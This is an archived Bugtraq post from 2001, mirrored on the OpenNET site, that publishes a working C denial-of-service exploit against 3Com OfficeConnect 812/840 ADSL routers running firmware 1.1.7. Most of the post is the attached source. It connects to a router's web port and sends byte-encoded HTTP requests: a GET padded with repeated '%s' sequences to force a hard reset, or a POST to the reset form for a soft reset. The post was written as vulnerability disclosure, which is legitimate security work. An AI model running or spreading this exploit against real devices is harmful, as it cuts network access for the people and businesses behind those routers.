The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version
Search
Совет: Как на perl сконвертировать изображения из одного формата в другой
SOFT - Unix Software catalog
LINKS - Unix resources		 TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

3Com OfficeConnect 812/840 Router DoS exploit code


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Fri, 21 Sep 2001 19:25:17 -0300
From: Bruno Ratnieks <sniffer@sniffer.net>
To: bugtraq@securityfocus.com
Subject: 3Com OfficeConnect 812/840  Router DoS exploit code

------=_NextPart_000_0049_01C142D3.2535CCA0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe others)
// security is weak
// Written pour sniffer <sniffer@sniffer.net>
// Fri Sep 21 15:51:35 BRT 2001
// Viva Brazil!

vulnerable
    3com OfficeConnect DSL Router 812 1.1.7
    3com OfficeConnect DSL Router 840 1.1.7

      .---.        .----------    Bruno Lacerda Ratnieks,
     /     \  __  /    ------    Technical Comm Developer
    / /     \(  )/    -----     Openweb Consultoria e Desen.
   //////   ' \/ `   ---       ╚╚-╩╩
  //// / // :    : ---        email: bruno@sniffer.net
 // /   /  /`    '--         mobile: (51) 983-665-40
//          //..\\          icq: 11111117
       ====UU====UU====    ╚╚-╩╩
           '//||\\`

------=_NextPart_000_0049_01C142D3.2535CCA0
Content-Type: application/octet-stream;
	name="adsl812-denial.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="adsl812-denial.c"

// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe =
others)=0A=
// Proof of concept, soft and hard reset, the security is weak=0A=
// Written pour sniffer <sniffer@sniffer.net> =0A=
// Fri Sep 21 15:51:35 BRT 2001=0A=
// Viva Brazil!=0A=
=0A=
#include <stdio.h>=0A=
#include <string.h>=0A=
#include <errno.h>=0A=
#include <stdlib.h>=0A=
#include <unistd.h>=0A=
#include <netdb.h>=0A=
#include <sys/types.h>=0A=
#include <sys/socket.h>=0A=
#include <arpa/inet.h>=0A=
#include <netinet/in.h>=0A=
=0A=
void =0A=
usage(binary)=0A=
char *binary;=0A=
{=0A=
fprintf(stderr,"3Com OfficeConnect 812 ADSL Router Denial of Service =
(%s)\nsniffer <sniffer@sniffer.net>\n\t%s <1 (soft) || 2 (hard)> <remote =
router>\n", __FILE__, binary);=0A=
}=0A=
int=0A=
main(argc, argv)=0A=
int argc;=0A=
char **argv;=0A=
{=0A=
int sockfd;=0A=
char senddata[1024];=0A=
char hardreset_data[] =3D { =0A=
									 71,69,84,32,47,103,114,97,112,104,105,99,115,=0A=
                   47,115,109,108,51,99,111,109,37,115,37,115,37,=0A=
                   115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
                   37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
                   115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
                   37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
                   115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
                   37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
                   115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
                   37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
                   115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
                   37,115,37,115,37,115,37,115,32,72,84,84,80,=0A=
                   47,49,46,48,10,10,0 };=0A=
char softreset_data[] =3D {=0A=
                   80,79,83,84,32,47,70,111,114,109,115,47,97,=0A=
                   100,115,108,95,114,101,115,101,116,32,72,84,84,=0A=
                   80,47,49,46,49,10,72,111,115,116,58,32,49,=0A=
                   57,50,46,49,54,56,46,49,46,50,53,52,10,=0A=
                   67,111,110,110,101,99,116,105,111,110,58,32,99,=0A=
                   108,111,115,101,10,67,111,110,116,101,110,116,45,=0A=
                   76,101,110,103,116,104,58,32,49,57,10,10,83,=0A=
                   117,98,109,105,116,61,82,101,115,101,116,37,50,=0A=
                   48,76,105,110,101,10,10,0 };=0A=
struct hostent *he;=0A=
struct sockaddr_in their_addr;=0A=
								=0A=
if( argc !=3D 3 )=0A=
{=0A=
	usage(argv[0]);=0A=
	exit(0);=0A=
}=0A=
if( atoi(argv[1]) >=3D 3 || atoi(argv[1]) =3D=3D 0 )=0A=
{=0A=
	  usage(argv[0]);=0A=
		exit(0);	=0A=
}=0A=
if((he=3Dgethostbyname(argv[2])) =3D=3D NULL)=0A=
{=0A=
	herror("gethostbyname");=0A=
	exit(1);=0A=
}=0A=
=0A=
their_addr.sin_family =3D AF_INET;=0A=
their_addr.sin_port =3D htons(80);=0A=
their_addr.sin_addr =3D (*(struct in_addr *)he->h_addr);=0A=
bzero(&their_addr.sin_zero, 8);=0A=
=0A=
if ((sockfd=3Dsocket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) =0A=
{=0A=
	perror("socket");=0A=
	exit(1);=0A=
}=0A=
=0A=
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct =
sockaddr)) =3D=3D -1) =0A=
{=0A=
	perror("connect");=0A=
	exit(1);=0A=
}=0A=
else=0A=
{=0A=
	printf("connected\n");=0A=
}=0A=
if(atoi(argv[1]) =3D=3D 1)=0A=
	strncpy(senddata, softreset_data, strlen(softreset_data));=0A=
else if(atoi(argv[1]) =3D=3D 2)=0A=
	strncpy(senddata, hardreset_data, strlen(hardreset_data));=0A=
=0A=
if(send(sockfd, senddata, sizeof(senddata), 0) =3D=3D -1) =0A=
{=0A=
	perror("send");=0A=
	exit(1);=0A=
}=0A=
else=0A=
{=0A=
	printf("evil data sent\n.. have a rice day\n");=0A=
}=0A=
=0A=
close(sockfd);=0A=
return(0);				=0A=
}=0A=

------=_NextPart_000_0049_01C142D3.2535CCA0--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки 		Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList